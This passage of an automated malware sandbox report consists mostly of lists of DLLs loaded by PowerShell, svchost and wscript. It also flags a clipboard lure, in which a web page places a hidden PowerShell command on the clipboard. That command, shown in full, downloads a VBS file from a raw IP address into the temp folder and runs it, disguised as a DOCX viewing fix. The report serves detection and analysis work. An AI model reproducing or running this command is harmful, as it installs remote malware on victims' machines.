Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualiza o de ficheiro DOCx
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualiza o de ficheiro DOCx			Jump to behavior

Persistence and Installation Behavior

HTML page adds supicious text to clipboard

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Clipboard modification: powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualizao de ficheiro DOCx

Windows Shell Script Host drops VBS files

Source: C:\Windows\SysWOW64\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\9772.vbs

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
